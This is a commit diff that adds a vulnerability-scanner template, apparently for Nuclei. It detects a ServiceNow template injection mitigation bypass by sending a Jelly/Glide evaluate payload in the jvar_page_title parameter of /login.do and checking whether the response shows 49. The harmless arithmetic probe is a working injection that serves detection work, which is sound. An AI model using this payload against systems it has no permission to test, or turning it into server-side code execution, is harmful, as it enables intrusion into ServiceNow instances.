Create servicenow-ssti.yaml
parent
064ae930b1
commit
9723a8da6a
|
@ -0,0 +1,20 @@
|
|||
id: servicenow-ssti
|
||||
|
||||
info:
|
||||
name: Service Now - Template Injection Mitigation Bypass
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<div class="outputmsg_text">49</div>'
|
Loading…
Reference in New Issue